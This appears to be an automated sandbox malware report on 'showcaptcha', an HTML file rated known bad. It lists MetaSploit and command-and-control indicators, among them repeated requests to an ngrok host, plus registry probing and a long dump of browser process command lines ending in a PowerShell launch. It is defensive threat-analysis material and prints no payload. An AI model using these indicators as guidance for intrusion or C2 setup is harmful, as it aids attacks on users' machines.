Analysis Overview
SHA256
5934e81a30bd867068c77a66b807996d7fc35c3328e81865fce4190717e79214
Threat Level: Known bad
The file showcaptcha was found to be: Known bad.
Malicious Activity Summary
MetaSploit
Blocklisted process makes network request
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Enumerates system info in registry
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Checks processor information in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-17 15:47
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-17 15:47
Reported
2024-06-17 16:18
Platform
win10v2004-20240226-en
Max time kernel
1795s
Max time network
1802s
Command Line
Signatures
MetaSploit
Blocklisted process makes network request
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | 2.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 2.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 2.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 2.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 2.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 2.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 2.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 2.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 2.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 2.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 2.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 2.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 2.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 2.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 2.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 2.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 2.tcp.eu.ngrok.io | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133631128871173952" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\showcaptcha.html
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff984f09758,0x7ff984f09768,0x7ff984f09778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=328 --field-trial-handle=1968,i,4421670688415561283,16612215649985656553,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1968,i,4421670688415561283,16612215649985656553,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2224 --field-trial-handle=1968,i,4421670688415561283,16612215649985656553,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3020 --field-trial-handle=1968,i,4421670688415561283,16612215649985656553,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3036 --field-trial-handle=1968,i,4421670688415561283,16612215649985656553,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4828 --field-trial-handle=1968,i,4421670688415561283,16612215649985656553,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 --field-trial-handle=1968,i,4421670688415561283,16612215649985656553,131072 /prefetch:8
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.0.496467355\552327086" -parentBuildID 20221007134813 -prefsHandle 1872 -prefMapHandle 1868 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0545262d-a97e-45fc-b56c-1b1488aa505e} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 1952 1e9f25dac58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.1.228310557\1411636788" -parentBuildID 20221007134813 -prefsHandle 2332 -prefMapHandle 2328 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c01249e-e5ef-490b-b291-7568b4811a38} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 2360 1e9f23e5658 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.2.1928703970\1166002412" -childID 1 -isForBrowser -prefsHandle 3280 -prefMapHandle 3276 -prefsLen 20888 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {99425484-831f-4665-a204-43e0ca8f5a22} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 2912 1e9f255e758 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.3.897746709\1463188637" -childID 2 -isForBrowser -prefsHandle 3620 -prefMapHandle 3616 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2663c401-e8ef-466f-9bc7-735a976771fc} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 3632 1e9de961958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.4.1541525042\1617074344" -childID 3 -isForBrowser -prefsHandle 4712 -prefMapHandle 4708 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {49c92963-38e8-495b-b716-9227dfc93e01} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 4724 1e9f869f258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.5.923604413\852831163" -childID 4 -isForBrowser -prefsHandle 5028 -prefMapHandle 4992 -prefsLen 26285 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0d1de743-c17f-42ff-9ab5-a829b5ea0a09} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5004 1e9de930258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.6.1877094455\1239144281" -childID 5 -isForBrowser -prefsHandle 5296 -prefMapHandle 5292 -prefsLen 26285 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {88af527e-c9ee-4c03-93f4-05bbf86f10c3} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5304 1e9f5c34d58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.7.999720461\477690942" -childID 6 -isForBrowser -prefsHandle 5472 -prefMapHandle 5476 -prefsLen 26285 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bdde0178-3b42-4d8a-8e98-8495fec6c20a} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5508 1e9de964158 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.8.2011626743\1593798441" -childID 7 -isForBrowser -prefsHandle 4104 -prefMapHandle 2732 -prefsLen 26460 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f15d8e3-1aff-4d49-ae30-91d4aa148fd3} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 2884 1e9f85a9258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.9.1182793985\1244494078" -childID 8 -isForBrowser -prefsHandle 5812 -prefMapHandle 5824 -prefsLen 26460 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9f1c500-bfe0-4e17-a7bf-a120586cb7ef} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5820 1e9f4e4f558 tab
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1348 --field-trial-handle=2284,i,15722001240173834669,15048020084704567542,262144 --variations-seed-version /prefetch:8
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.10.1435694696\721073392" -childID 9 -isForBrowser -prefsHandle 4828 -prefMapHandle 4836 -prefsLen 26460 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {af9360c2-7197-4fb3-845f-0467d2919707} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5172 1e9f9e2b958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.11.1985748577\43867022" -parentBuildID 20221007134813 -prefsHandle 5980 -prefMapHandle 6028 -prefsLen 26460 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8fa30e0e-c05b-4594-80f2-44c807e93ced} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5996 1e9fa10f658 rdd
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.12.2114010987\876774538" -childID 10 -isForBrowser -prefsHandle 5332 -prefMapHandle 5220 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {50a54546-1d5a-40c9-9cd6-75fe3ddbdbe9} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5908 1e9f5c65f58 tab
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4e8 0x4c0
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.13.804170478\409992591" -childID 11 -isForBrowser -prefsHandle 6472 -prefMapHandle 6468 -prefsLen 27425 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4dc20bdc-2b11-4e54-bbaf-65a4c6622652} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 6484 1e9f932cd58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.14.455406405\527018596" -childID 12 -isForBrowser -prefsHandle 4908 -prefMapHandle 3316 -prefsLen 27434 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {69a9cd44-0e8d-40d4-9660-61d56d69bbd6} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 4784 1e9f9b9c458 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.15.1005855958\1191682558" -childID 13 -isForBrowser -prefsHandle 6844 -prefMapHandle 6848 -prefsLen 27434 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e9dbc297-2a64-478a-83ab-b489f1e6fd39} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5396 1e9fbf1bf58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.16.467847512\853206893" -childID 14 -isForBrowser -prefsHandle 5088 -prefMapHandle 5140 -prefsLen 27434 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c44b810e-4aa0-4720-b836-bd9880edfd5a} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 6936 1e9f9eb3758 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2088.17.1471832794\537484187" -childID 15 -isForBrowser -prefsHandle 5308 -prefMapHandle 4908 -prefsLen 27434 -prefMapSize 233444 -jsInitHandle 1088 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {08d21772-198c-454f-a54d-00153c56a1e9} 2088 "\\.\pipe\gecko-crash-server-pipe.2088" 5320 1e9f5c66558 tab
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3724 --field-trial-handle=2284,i,15722001240173834669,15048020084704567542,262144 --variations-seed-version /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff984f09758,0x7ff984f09768,0x7ff984f09778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1804 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2256 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3276 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3296 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3832 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4844 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4996 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5184 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5040 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5496 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5764 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2224 --field-trial-handle=1924,i,16160562145005853554,2681731165103209270,131072 /prefetch:8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
